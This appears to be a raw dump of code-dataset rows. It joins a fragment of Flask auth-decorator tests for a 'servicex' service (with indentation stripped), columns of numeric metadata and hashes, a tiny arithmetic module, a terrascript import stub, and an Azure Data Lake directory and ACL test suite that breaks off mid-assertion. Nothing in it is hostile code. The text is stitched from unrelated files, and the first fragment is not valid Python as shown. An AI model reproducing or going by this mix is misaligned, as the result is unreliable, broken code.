client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
from servicex.decorators import auth_required
decorated = auth_required(fake_route)
response: Response = decorated()
assert response.status_code == 401
def test_auth_decorator_authorized(self, mocker, mock_jwt_extended, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
from servicex.decorators import auth_required
decorated = auth_required(fake_route)
response: Response = decorated()
assert response.status_code == 200
def test_admin_decorator_auth_disabled(self, client):
with client.application.app_context():
from servicex.decorators import admin_required
decorated = admin_required(fake_route)
response: Response = decorated()
assert response.status_code == 200
def test_admin_decorator_unauthorized(self, mocker, mock_jwt_extended, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
user.admin = False
with client.application.app_context():
from servicex.decorators import admin_required
decorated = admin_required(fake_route)
response: Response = decorated()
assert response.status_code == 401
def test_admin_decorator_authorized(self, mock_jwt_extended, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
user.admin = True
with client.application.app_context():
from servicex.decorators import admin_required
decorated = admin_required(fake_route)
response: Response = decorated()
assert response.status_code == 200
def test_auth_decorator_integration_auth_disabled(self, mocker, client):
fake_transform_id = 123
data = {'id': fake_transform_id}
mock = mocker.patch('servicex.resources.transformation_request'
'.TransformRequest.return_request').return_value
mock.to_json.return_value = data
with client.application.app_context():
response: Response = client.get(f'servicex/transformation/{fake_transform_id}')
print(response.data)
assert response.status_code == 200
assert response.json == data
def test_auth_decorator_integration_no_header(self):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('servicex/transformation/123')
print(response.data)
assert response.status_code == 401
assert response.json['message'] == 'Missing Authorization Header'
def test_auth_decorator_integration_user_deleted(self):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('servicex/transformation/123',
headers=self.fake_header())
assert response.status_code == 401
assert 'deleted' in response.json['message']
def test_auth_decorator_integration_user_pending(self, mocker, user):
user.pending = True
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('servicex/transformation/123',
headers=self.fake_header())
assert response.status_code == 401
assert 'pending' in response.json['message']
def test_auth_decorator_integration_authorized(self, mocker, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
fake_transform_id = 123
data = {'id': fake_transform_id}
mock = mocker.patch('servicex.resources.transformation_request'
'.TransformRequest.return_request').return_value
mock.submitted_by = user.id
mock.to_json.return_value = data
with client.application.app_context():
response: Response = client.get(f'servicex/transformation/{fake_transform_id}',
headers=self.fake_header())
print(response.data)
assert response.status_code == 200
assert response.json == data
def test_auth_decorator_integration_oauth(self, mocker, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
fake_transform_id = 123
data = {'id': fake_transform_id}
mock = mocker.patch('servicex.resources.transformation_request'
'.TransformRequest.return_request').return_value
mock.submitted_by = user.id
mock.to_json.return_value = data
with client.session_transaction() as sess:
sess['is_authenticated'] = True
with client.application.app_context():
response: Response = client.get(f'servicex/transformation/{fake_transform_id}')
print(response.data)
assert response.status_code == 200
assert response.json == data
def test_admin_decorator_integration_auth_disabled(self, mocker, client):
data = {'users': [{'id': 1234}]}
mocker.patch('servicex.models.UserModel.return_all', return_value=data)
with client.application.app_context():
response: Response = client.get('users')
assert response.status_code == 200
assert response.json == data
def test_admin_decorator_integration_no_header(self):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('users')
assert response.status_code == 401
assert response.json['message'] == 'Missing Authorization Header'
def test_admin_decorator_integration_not_authorized(self, user):
user.admin = False
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('users', headers=self.fake_header())
assert response.status_code == 401
assert 'restricted' in response.json['message']
def test_admin_decorator_integration_authorized(self, mocker, user):
user.admin = True
data = {'users': [{'id': 1234}]}
mocker.patch('servicex.models.UserModel.return_all', return_value=data)
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.application.app_context():
response: Response = client.get('users', headers=self.fake_header())
assert response.status_code == 200
assert response.json == data
def test_admin_decorator_integration_oauth_authorized(self, mocker, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
data = {'users': [{'id': 1234}]}
mocker.patch('servicex.models.UserModel.return_all', return_value=data)
with client.session_transaction() as sess:
sess['is_authenticated'] = True
sess['admin'] = True
with client.application.app_context():
response: Response = client.get('users')
assert response.status_code == 200
assert response.json == data
def test_admin_decorator_integration_oauth_not_authorized(self, user):
client = self._test_client(extra_config={'ENABLE_AUTH': True})
with client.session_transaction() as sess:
sess['is_authenticated'] = True
sess['admin'] = False
with client.application.app_context():
response: Response = client.get('users')
assert response.status_code == 401
assert 'restricted' in response.json['message']
| 47.200855
| 91
| 0.657945
| 1,215
| 11,045
| 5.706996
| 0.095473
| 0.064609
| 0.063455
| 0.076147
| 0.881886
| 0.851168
| 0.822469
| 0.799394
| 0.799394
| 0.784396
| 0
| 0.012509
| 0.247261
| 11,045
| 233
| 92
| 47.403433
| 0.821506
| 0
| 0
| 0.741463
| 0
| 0
| 0.105115
| 0.052331
| 0
| 0
| 0
| 0
| 0.190244
| 1
| 0.121951
| false
| 0
| 0.058537
| 0.004878
| 0.195122
| 0.019512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ef7ca1a5f8e6cdd4eafe132d38781d588581723
| 103
|
py
|
Python
|
executable/Vishal_DramaPFAssgn1.py
|
rana-akash/hackFest
|
b6a73c8a38f089a56596e36e7b11ff235a0f5704
|
[
"MIT"
] | null | null | null |
executable/Vishal_DramaPFAssgn1.py
|
rana-akash/hackFest
|
b6a73c8a38f089a56596e36e7b11ff235a0f5704
|
[
"MIT"
] | null | null | null |
executable/Vishal_DramaPFAssgn1.py
|
rana-akash/hackFest
|
b6a73c8a38f089a56596e36e7b11ff235a0f5704
|
[
"MIT"
] | null | null | null |
def add(a,b): return a+b
def sub(a,b): return a-b
def mult(a,b): return a*b
def div(a,b): return a/b
| 25.75
| 26
| 0.631068
| 28
| 103
| 2.321429
| 0.285714
| 0.246154
| 0.492308
| 0.553846
| 0.753846
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174757
| 103
| 4
| 27
| 25.75
| 0.764706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| false
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
0efe487cfc46df57f098746f7d4238db58fa0121
| 428
|
py
|
Python
|
terrascript/resource/netapp_cloudmanager.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
terrascript/resource/netapp_cloudmanager.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
terrascript/resource/netapp_cloudmanager.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# terrascript/resource/netapp_cloudmanager.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:22:08 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.resource.netapp_cloudmanager
#
# instead of
#
# >>> import terrascript.resource.NetApp.netapp_cloudmanager
#
# This is only available for 'official' and 'partner' providers.
from terrascript.resource.NetApp.netapp_cloudmanager import *
| 28.533333
| 73
| 0.773364
| 53
| 428
| 6.169811
| 0.660377
| 0.232416
| 0.30581
| 0.2263
| 0.262997
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03183
| 0.119159
| 428
| 14
| 74
| 30.571429
| 0.835544
| 0.794393
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 7
| 1608a99e3bb71ba13e8f586b44469380c2a151d1
| 60,557
| py
| Python
| sdk/storage/azure-storage-file-datalake/tests/test_directory.py
| dubiety/azure-sdk-for-python
| 62ffa839f5d753594cf0fe63668f454a9d87a346
| [ "MIT" ] | null | null | null
| sdk/storage/azure-storage-file-datalake/tests/test_directory.py
| dubiety/azure-sdk-for-python
| 62ffa839f5d753594cf0fe63668f454a9d87a346
| [ "MIT" ] | null | null | null
| sdk/storage/azure-storage-file-datalake/tests/test_directory.py
| dubiety/azure-sdk-for-python
| 62ffa839f5d753594cf0fe63668f454a9d87a346
| [ "MIT" ] | null | null | null |
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import unittest
from datetime import datetime, timedelta
import pytest
from azure.core import MatchConditions
from azure.core.exceptions import HttpResponseError, ResourceExistsError, ResourceNotFoundError, \
ResourceModifiedError, ServiceRequestError, AzureError
from azure.storage.filedatalake import ContentSettings, DirectorySasPermissions, DataLakeDirectoryClient, \
generate_file_system_sas, FileSystemSasPermissions
from azure.storage.filedatalake import DataLakeServiceClient, generate_directory_sas
from azure.storage.filedatalake._models import AccessControlChangeResult, AccessControlChangeCounters
from azure.storage.filedatalake._serialize import _SUPPORTED_API_VERSIONS
from settings.testcase import DataLakePreparer
from devtools_testutils.storage import StorageTestCase
# ------------------------------------------------------------------------------
TEST_DIRECTORY_PREFIX = 'directory'
REMOVE_ACL = "mask," + "default:user,default:group," + \
"user:ec3595d6-2c17-4696-8caa-7e139758d24a,group:ec3595d6-2c17-4696-8caa-7e139758d24a," + \
"default:user:ec3595d6-2c17-4696-8caa-7e139758d24a,default:group:ec3595d6-2c17-4696-8caa-7e139758d24a"
# ------------------------------------------------------------------------------
class DirectoryTest(StorageTestCase):
def _setUp(self, account_name, account_key):
url = self.account_url(account_name, 'dfs')
self.dsc = DataLakeServiceClient(url, credential=account_key, logging_enable=True)
self.config = self.dsc._config
self.file_system_name = self.get_resource_name('filesystem')
if not self.is_playback():
file_system = self.dsc.get_file_system_client(self.file_system_name)
try:
file_system.create_file_system(timeout=5)
except ResourceExistsError:
pass
def tearDown(self):
if not self.is_playback():
try:
self.dsc.delete_file_system(self.file_system_name)
for file_system in self.dsc.list_file_systems():
self.dsc.delete_file_system(file_system.name)
except Exception:  # narrowed from a bare except; cleanup errors are still swallowed
pass
return super(DirectoryTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_directory_reference(self, prefix=TEST_DIRECTORY_PREFIX):
directory_name = self.get_resource_name(prefix)
return directory_name
def _create_directory_and_get_directory_client(self, directory_name=None):
directory_name = directory_name if directory_name else self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
return directory_client
def _create_sub_directory_and_files(self, directory_client, num_of_dirs, num_of_files_per_dir):
# the name suffix matter since we need to avoid creating the same directories/files in record mode
for i in range(0, num_of_dirs):
sub_dir = directory_client.create_sub_directory(self.get_resource_name('subdir' + str(i)))
for j in range(0, num_of_files_per_dir):
sub_dir.create_file(self.get_resource_name('subfile' + str(j)))
def _create_file_system(self):
return self.dsc.create_file_system(self._get_file_system_reference())
# --Helpers-----------------------------------------------------------------
@DataLakePreparer()
def test_create_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
content_settings = ContentSettings(
content_language='spanish',
content_disposition='inline')
# Act
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
created = directory_client.create_directory(content_settings=content_settings)
# Assert
self.assertTrue(created)
@DataLakePreparer()
def test_directory_exists(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
directory_client1 = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client2 = self.dsc.get_directory_client(self.file_system_name, "nonexistentdir")
directory_client1.create_directory()
self.assertTrue(directory_client1.exists())
self.assertFalse(directory_client2.exists())
@DataLakePreparer()
def test_using_oauth_token_credential_to_create_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# generate a token with directory level create permission
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
response = directory_client.create_directory()
self.assertIsNotNone(response)
@DataLakePreparer()
def test_create_directory_with_match_conditions(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
# Act
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
created = directory_client.create_directory(match_condition=MatchConditions.IfMissing)
# Assert
self.assertTrue(created)
@DataLakePreparer()
def test_create_directory_with_permission(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
# Act
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
created = directory_client.create_directory(permissions="rwxr--r--", umask="0000")
prop = directory_client.get_access_control()
# Assert
self.assertTrue(created)
self.assertEqual(prop['permissions'], 'rwxr--r--')
@DataLakePreparer()
def test_create_directory_with_content_settings(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
content_settings = ContentSettings(
content_language='spanish',
content_disposition='inline')
# Act
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
created = directory_client.create_directory(content_settings=content_settings)
# Assert
self.assertTrue(created)
@DataLakePreparer()
def test_create_directory_with_metadata(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
# Act
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
created = directory_client.create_directory(metadata=metadata)
properties = directory_client.get_directory_properties()
# Assert
self.assertTrue(created)
@DataLakePreparer()
def test_delete_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata)
directory_client.delete_directory()
@DataLakePreparer()
def test_delete_directory_with_if_modified_since(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
prop = directory_client.get_directory_properties()
with self.assertRaises(ResourceModifiedError):
directory_client.delete_directory(if_modified_since=prop['last_modified'])
@DataLakePreparer()
def test_create_sub_directory_and_delete_sub_directory(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
# Arrange
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
# Create a directory first, to prepare for creating sub directory
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata)
# Create sub directory from the current directory
sub_directory_name = 'subdir'
sub_directory_created = directory_client.create_sub_directory(sub_directory_name)
# to make sure the sub directory was indeed created by get sub_directory properties from sub directory client
sub_directory_client = self.dsc.get_directory_client(self.file_system_name,
directory_name + '/' + sub_directory_name)
sub_properties = sub_directory_client.get_directory_properties()
# Assert
self.assertTrue(sub_directory_created)
self.assertTrue(sub_properties)
# Act
directory_client.delete_sub_directory(sub_directory_name)
with self.assertRaises(ResourceNotFoundError):
sub_directory_client.get_directory_properties()
@DataLakePreparer()
def test_set_access_control(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata)
response = directory_client.set_access_control(permissions='0777')
# Assert
self.assertIsNotNone(response)
@DataLakePreparer()
def test_set_access_control_with_acl(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata)
acl = 'user::rwx,group::r-x,other::rwx'
directory_client.set_access_control(acl=acl)
access_control = directory_client.get_access_control()
# Assert
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_set_access_control_if_none_modified(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
resp = directory_client.create_directory()
response = directory_client.set_access_control(permissions='0777', etag=resp['etag'],
match_condition=MatchConditions.IfNotModified)
# Assert
self.assertIsNotNone(response)
@DataLakePreparer()
def test_get_access_control(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
metadata = {'hello': 'world', 'number': '42'}
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory(metadata=metadata, permissions='0777')
# Act
response = directory_client.get_access_control()
# Assert
self.assertIsNotNone(response)
@DataLakePreparer()
def test_get_access_control_with_match_conditions(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
resp = directory_client.create_directory(permissions='0777', umask='0000')
# Act
response = directory_client.get_access_control(etag=resp['etag'], match_condition=MatchConditions.IfNotModified)
# Assert
self.assertIsNotNone(response)
self.assertEqual(response['permissions'], 'rwxrwxrwx')
@DataLakePreparer()
def test_set_access_control_recursive(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
summary = directory_client.set_access_control_recursive(acl=acl)
# Assert
# +1 as the dir itself was also included
self.assertEqual(summary.counters.directories_successful, num_sub_dirs + 1)
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
self.assertIsNone(summary.continuation)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_set_access_control_recursive_throws_exception_containing_continuation_token(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
response_list = list()
def callback(response):
response_list.append(response)
if len(response_list) == 2:
raise ServiceRequestError("network problem")
acl = 'user::rwx,group::r-x,other::rwx'
with self.assertRaises(AzureError) as acl_error:
directory_client.set_access_control_recursive(acl=acl, batch_size=2, max_batches=2,
raw_response_hook=callback, retry_total=0)
self.assertIsNotNone(acl_error.exception.continuation_token)
self.assertEqual(acl_error.exception.message, "network problem")
self.assertIsInstance(acl_error.exception, ServiceRequestError)
@DataLakePreparer()
def test_set_access_control_recursive_in_batches(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
summary = directory_client.set_access_control_recursive(acl=acl, batch_size=2)
# Assert
# +1 as the dir itself was also included
self.assertEqual(summary.counters.directories_successful, num_sub_dirs + 1)
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
self.assertIsNone(summary.continuation)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_set_access_control_recursive_in_batches_with_progress_callback(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
last_response = AccessControlChangeResult(None, "")
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
last_response.counters = resp.aggregate_counters
summary = directory_client.set_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
self.assertEqual(summary.counters.files_successful, num_sub_dirs * num_file_per_sub_dir)
self.assertEqual(summary.counters.failure_count, 0)
self.assertIsNone(summary.continuation)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(summary.counters.directories_successful, last_response.counters.directories_successful)
self.assertEqual(summary.counters.files_successful, last_response.counters.files_successful)
self.assertEqual(summary.counters.failure_count, last_response.counters.failure_count)
access_control = directory_client.get_access_control()
self.assertIsNotNone(access_control)
self.assertEqual(acl, access_control['acl'])
@DataLakePreparer()
def test_set_access_control_recursive_with_failures(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
if not self.is_playback():
return
root_directory_client = self.dsc.get_file_system_client(self.file_system_name)._get_root_directory_client()
root_directory_client.set_access_control(acl="user::--x,group::--x,other::--x")
# Using an AAD identity, create a directory to put files under that
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
# Create a file as super user
self.dsc.get_directory_client(self.file_system_name, directory_name).get_file_client("cannottouchthis") \
.create_file()
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
failed_entries.append(resp.batch_failures)
summary = directory_client.set_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=2)
# Assert
self.assertEqual(summary.counters.failure_count, 1)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 1)
@DataLakePreparer()
def test_set_access_control_recursive_stop_on_failures(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
if not self.is_playback():
return
root_directory_client = self.dsc.get_file_system_client(self.file_system_name)._get_root_directory_client()
root_directory_client.set_access_control(acl="user::--x,group::--x,other::--x")
# Using an AAD identity, create a directory to put files under that
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
# Create a file as super user
self.dsc.get_directory_client(self.file_system_name, directory_name).get_file_client("cannottouchthis") \
.create_file()
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
if resp.batch_failures:
failed_entries.extend(resp.batch_failures)
summary = directory_client.set_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=6)
# Assert
self.assertEqual(summary.counters.failure_count, 1)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 1)
@DataLakePreparer()
def test_set_access_control_recursive_continue_on_failures(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
if not self.is_playback():
return
root_directory_client = self.dsc.get_file_system_client(self.file_system_name)._get_root_directory_client()
root_directory_client.set_access_control(acl="user::--x,group::--x,other::--x")
# Using an AAD identity, create a directory to put files under that
directory_name = self._get_directory_reference()
token_credential = self.generate_oauth_token()
directory_client = DataLakeDirectoryClient(self.dsc.url, self.file_system_name, directory_name,
credential=token_credential)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
# Create a file as super user
self.dsc.get_directory_client(self.file_system_name, directory_name).get_file_client("cannottouchthis") \
.create_file()
self.dsc.get_directory_client(self.file_system_name, directory_name).get_sub_directory_client("cannottouchthisdir") \
.create_directory()
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
def progress_callback(resp):
running_tally.directories_successful += resp.batch_counters.directories_successful
running_tally.files_successful += resp.batch_counters.files_successful
running_tally.failure_count += resp.batch_counters.failure_count
if resp.batch_failures:
failed_entries.extend(resp.batch_failures)
# set acl for all directories
summary = directory_client.set_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=6,
continue_on_failure=True)
# Assert
self.assertEqual(summary.counters.failure_count, 2)
self.assertEqual(summary.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 2)
self.assertIsNone(summary.continuation)
# reset the counter, set acl for part of the directories
running_tally = AccessControlChangeCounters(0, 0, 0)
failed_entries = []
summary2 = directory_client.set_access_control_recursive(acl=acl, progress_hook=progress_callback,
batch_size=6, max_batches=3,
continue_on_failure=True)
self.assertEqual(summary2.counters.failure_count, 2)
self.assertEqual(summary2.counters.directories_successful, running_tally.directories_successful)
self.assertEqual(summary2.counters.files_successful, running_tally.files_successful)
self.assertEqual(summary2.counters.failure_count, running_tally.failure_count)
self.assertEqual(len(failed_entries), 2)
self.assertIsNotNone(summary2.continuation)
@DataLakePreparer()
def test_set_access_control_recursive_in_batches_with_explicit_iteration(self, datalake_storage_account_name, datalake_storage_account_key):
self._setUp(datalake_storage_account_name, datalake_storage_account_key)
directory_name = self._get_directory_reference()
directory_client = self.dsc.get_directory_client(self.file_system_name, directory_name)
directory_client.create_directory()
num_sub_dirs = 5
num_file_per_sub_dir = 5
self._create_sub_directory_and_files(directory_client, num_sub_dirs, num_file_per_sub_dir)
acl = 'user::rwx,group::r-x,other::rwx'
running_tally = AccessControlChangeCounters(0, 0, 0)
result = AccessControlChangeResult(None, "")
iteration_count = 0
max_batches = 2
batch_size = 2
while result.continuation is not None:
result = directory_client.set_access_control_recursive(acl=acl, batch_size=batch_size, max_batches=max_batches,
continuation=result.continuation)
running_tally.directories_successful += result.counters.directories_successful
running_tally.files_successful += result.counters.files_successful
running_tally.failure_count += result.counters.failure_count
iteration_count += 1
# Assert
self.assertEqual(running_tally.directories_successful,
num_sub_dirs + 1) # +1 as the dir itself was also included
